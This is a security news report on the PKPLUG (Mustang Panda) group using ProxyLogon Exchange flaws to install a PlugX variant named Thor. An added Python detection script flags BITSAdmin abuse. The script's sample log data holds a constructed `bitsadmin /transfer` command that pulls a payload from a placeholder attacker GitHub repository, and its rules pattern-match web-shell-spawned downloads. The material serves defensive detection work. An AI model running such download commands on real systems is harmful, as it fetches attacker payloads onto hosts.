A Chinese cyberespionage group leveraged flaws in Microsoft Exchange Server that had come to light earlier to deploy a previously undocumented variant of a remote access trojan (RAT) on compromised systems.
Attributing the activity to a group tracked as PKPLUG (also known as Mustang Panda and HoneyMyte), researchers identified a new version of the modular PlugX malware, called Thor, that was delivered as a post-exploitation tool to one of the breached servers.
PlugX is a fully featured second-stage implant with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote command shell.
After Microsoft disclosed that the China-based hacking group Hafnium was exploiting zero-day bugs in Exchange Server, collectively known as ProxyLogon, to steal sensitive data from select targets, multiple threat actors, including ransomware groups (DearCry and Black Kingdom), were observed exploiting the flaws to hijack Exchange servers and install a web shell that granted code execution at the highest privilege level.
PKPLUG now joins that list. The attackers bypassed antivirus detection mechanisms on targeted Microsoft Exchange servers by leveraging legitimate executables such as BITSAdmin to retrieve a seemingly innocuous file ("Aro.dat") from an actor-controlled GitHub repository. The file, which houses the encrypted and compressed PlugX payload, has a name that alludes to a freely available advanced repair and optimization tool designed to clean up and fix issues in the Windows Registry.
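The living-off-the-land step described above (BITSAdmin fetching a payload from a code-hosting site, on a server where a web shell is the likely foothold) is something a detection engineer can hunt for in process-creation telemetry. The following Python is an added example written for this page, not code from the researchers or from any product. It parses constructed Sysmon-style process-creation records (the key=value line format, the hostnames and the repository path are all made up for the example) and flags `bitsadmin.exe` invocations that use `/transfer` with a remote URL, that are spawned by the IIS worker process `w3wp.exe` (an assumed heuristic for web-shell-driven execution on an Exchange host), or that pull from GitHub domains, reporting each reason separately so an analyst can weigh them.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample records in a Sysmon Event ID 1 style (one event per line,
# key=value pairs, quoted where the value contains spaces). These are made up
# for this example and are not real telemetry; the GitHub path is a placeholder.
SAMPLE_EVENTS = [
    r'UtcTime="2021-07-27 10:01:02" Image=C:\Windows\System32\bitsadmin.exe '
    r'ParentImage=C:\Windows\System32\inetsrv\w3wp.exe '
    r'CommandLine="bitsadmin /transfer upd /download /priority normal '
    r'https://raw.githubusercontent.com/PLACEHOLDER-ACTOR/repo/main/Aro.dat C:\Users\Public\Aro.dat"',
    r'UtcTime="2021-07-27 10:05:00" Image=C:\Windows\System32\bitsadmin.exe '
    r'ParentImage=C:\Windows\System32\svchost.exe CommandLine="bitsadmin /list /allusers"',
    r'UtcTime="2021-07-27 10:06:10" Image=C:\Windows\System32\notepad.exe '
    r'ParentImage=C:\Windows\explorer.exe CommandLine="notepad.exe"',
    r'UtcTime="2021-07-27 10:09:45" Image=C:\Windows\System32\bitsadmin.exe '
    r'ParentImage=C:\Windows\explorer.exe '
    r'CommandLine="bitsadmin /transfer job1 https://updates.example.internal/pkg.msi C:\Temp\pkg.msi"',
]

# key=value tokens; a value is either a double-quoted string or a run of non-spaces.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL_RE = re.compile(r'https?://\S+', re.IGNORECASE)

# Domains that host the "innocuous" file in the reported attack; assumed watchlist.
CODE_HOSTING_DOMAINS = ("github.com", "githubusercontent.com")
IIS_WORKER = "\\w3wp.exe"  # IIS worker process; web shells on Exchange run under it (assumption)


@dataclass
class Finding:
    time: str
    command: str
    url: Optional[str]
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict, stripping surrounding quotes."""
    return {key: raw.strip('"') for key, raw in FIELD_RE.findall(line)}


def assess(event: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding if this process-creation event looks like BITSAdmin abuse."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\bitsadmin.exe"):
        return None  # only BITSAdmin is in scope for this detection

    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    match = URL_RE.search(cmd)
    url = match.group(0) if match else None

    reasons: List[str] = []
    if "/transfer" in cmd.lower() and url:
        reasons.append("bitsadmin /transfer with remote URL")
    if parent.endswith(IIS_WORKER):
        reasons.append("spawned by IIS worker process (possible web shell)")
    if url and any(d in url.lower() for d in CODE_HOSTING_DOMAINS):
        reasons.append("download from code-hosting site")

    if not reasons:
        return None  # e.g. plain "bitsadmin /list" from a service host
    return Finding(time=event.get("UtcTime", ""), command=cmd, url=url, reasons=reasons)


def scan(lines: List[str]) -> List[Finding]:
    """Run the detection over raw log lines and collect the findings in order."""
    findings = []
    for line in lines:
        finding = assess(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.time}  {len(f.reasons)} indicator(s): {'; '.join(f.reasons)}")
        print(f"    {f.command}")
```

Running the script prints two hits: the first event trips all three indicators and is the one worth paging on, while the fourth event (a `/transfer` from a user's Explorer session to an internal host) surfaces only the generic indicator and is the kind of result that gets tuned with an allow-list of known update sources. Because a quoted-`CommandLine` parser is separate from the scoring logic, the same `assess` function can be pointed at a real Sysmon or EDR export once a loader for that format is written.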
The latest sample of PlugX comes equipped with a variety of plug-ins that "provide attackers various capabilities to monitor, update and interact with the compromised system to fulfil their objectives," the researchers said. Thor's links to PKPLUG stem from piecing together the command-and-control infrastructure as well as overlaps in the malicious behaviors detected among other recently discovered PlugX samples.
Additional indicators of compromise associated with the attack have been made available by the researchers, who also released a Python script that can decrypt and unpack encrypted PlugX payloads without the associated PlugX loaders.